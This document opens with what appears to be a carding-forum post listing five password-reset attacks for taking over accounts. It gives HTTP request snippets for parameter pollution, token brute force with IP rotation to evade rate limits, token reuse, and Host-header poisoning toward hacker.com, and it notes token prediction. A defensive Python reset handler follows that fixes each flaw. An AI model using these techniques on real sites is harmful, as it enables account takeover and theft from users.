Account hijacking with password reset feature

Carding 4 Carders

There are several ways that can help you reset the password of any user on the site to hijack his account:

1. Include your mail as the second parameter (this way you can get the reset link):
Code:
POST /resetPassword
[...]
email=victim@tld.xyz&email=hacker@tld.xyz

2. Brute force the reset token, if it is numeric. You can use Burpsuite's IP Rotator to bypass the rate limit in case it is IP based:
Code:
POST /resetPassword
[...]
email=victim@tld.xyz&code=$BRUTE$

3. Try using your reset token for the victim's account:
Code:
POST /resetPassword
[...]
email=victim@tld.xyz&code=$YOUR-TOKEN$

4. Implementation of the host header; change website.com to hacker.com (victim may receive a reset link from your host instead of the original site):
Code:
POST /resetPassword
Host: hacker.com
[...]

5. Try to figure out how tokens are generated. As an example, they can be:
- created based on a timestamp (date, current time, etc.)
- created based on user ID
- created based on the user's email
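The five weaknesses in the post map onto five server-side checks in a password-reset flow. The following is an added example written for this page, not code from the original post: a minimal reset handler that refuses duplicated form fields (point 1), issues a 256-bit CSPRNG token that is stored hashed, expires, is single use and has a per-account attempt cap (points 2 and 5), binds every token to the account it was issued for (point 3), and builds the reset link from an allowlist of the site's own hostnames rather than from the client's Host header (point 4). The names ALLOWED_HOSTS, ResetStore, handle_reset_request and handle_reset_confirm, and all sample requests, are assumptions constructed for the illustration.

```python
# Added example, not code from the original post. Names such as ALLOWED_HOSTS,
# ResetStore, handle_reset_request and handle_reset_confirm are assumptions
# made for this illustration; the sample inputs under __main__ are constructed.
import hashlib
import hmac
import secrets
import time
from urllib.parse import parse_qs, quote

ALLOWED_HOSTS = {"website.com", "www.website.com"}  # constructed allowlist of our own hostnames
TOKEN_TTL_SECONDS = 15 * 60                          # short lifetime limits the guessing window
MAX_ATTEMPTS = 5                                     # per-account cap, independent of client IP


class ResetStore:
    """In-memory reset-token store keyed by account email (a real site would use a database)."""

    def __init__(self):
        self._records = {}  # email -> {"hash": ..., "expires": ..., "attempts": ...}

    def issue(self, email, now=None):
        now = time.time() if now is None else now
        # 32 random bytes from the OS CSPRNG: not derived from time, user ID or email,
        # and far too large to enumerate (points 2 and 5 in the post).
        token = secrets.token_urlsafe(32)
        self._records[email.lower()] = {
            "hash": hashlib.sha256(token.encode()).hexdigest(),  # store only a digest
            "expires": now + TOKEN_TTL_SECONDS,
            "attempts": 0,
        }
        return token

    def consume(self, email, token, now=None):
        """Return True once for the right (email, token) pair; False otherwise."""
        now = time.time() if now is None else now
        key = email.lower()
        rec = self._records.get(key)  # the token is bound to the account it was issued for (point 3)
        if rec is None:
            return False
        if now > rec["expires"] or rec["attempts"] >= MAX_ATTEMPTS:
            self._records.pop(key, None)  # expired or over budget: invalidate outright
            return False
        rec["attempts"] += 1
        presented = hashlib.sha256(token.encode()).hexdigest()
        if not hmac.compare_digest(presented, rec["hash"]):  # constant-time comparison
            return False
        self._records.pop(key, None)  # single use
        return True


def _single_valued(body):
    """Parse a form body, refusing any field that was sent more than once (point 1)."""
    fields = parse_qs(body, keep_blank_values=True)
    if any(len(values) != 1 for values in fields.values()):
        return None
    return {k: v[0] for k, v in fields.items()}


def handle_reset_request(store, host_header, body, now=None):
    """Step 1: the user asks for a reset. Returns (status, link-or-reason).

    The link is what the mailer would send, and only to the address on file:
    nothing in the request body chooses where the mail goes.
    """
    fields = _single_valued(body)
    if fields is None:
        return 400, "duplicate form field rejected"
    host = (host_header or "").split(":")[0].lower()
    if host not in ALLOWED_HOSTS:  # link comes from our allowlist, never from a raw Host header (point 4)
        return 400, "untrusted Host header rejected"
    email = fields.get("email", "")
    token = store.issue(email, now)
    return 200, f"https://{host}/resetPassword?email={quote(email)}&code={token}"


def handle_reset_confirm(store, body, now=None):
    """Step 2: the user presents email plus code from the link. Returns (status, reason)."""
    fields = _single_valued(body)
    if fields is None:
        return 400, "duplicate form field rejected"
    if store.consume(fields.get("email", ""), fields.get("code", ""), now):
        return 200, "token accepted; proceed to set a new password"
    return 403, "invalid, expired, reused or over-tried token"


if __name__ == "__main__":
    store = ResetStore()
    print(handle_reset_request(store, "website.com", "email=victim@tld.xyz&email=hacker@tld.xyz"))
    print(handle_reset_request(store, "hacker.com", "email=victim@tld.xyz"))
    status, link = handle_reset_request(store, "website.com", "email=victim@tld.xyz")
    print(status, link)
    print(handle_reset_confirm(store, "email=victim@tld.xyz&code=" + link.split("code=")[1]))
```

The attempt cap lives on the account record rather than on the client IP, so rotating source addresses does not reset it; the expiry and single-use pop make each token worth at most one guess window. Generic responses for unknown addresses and an audit log of rejected requests would be the next additions in a production handler.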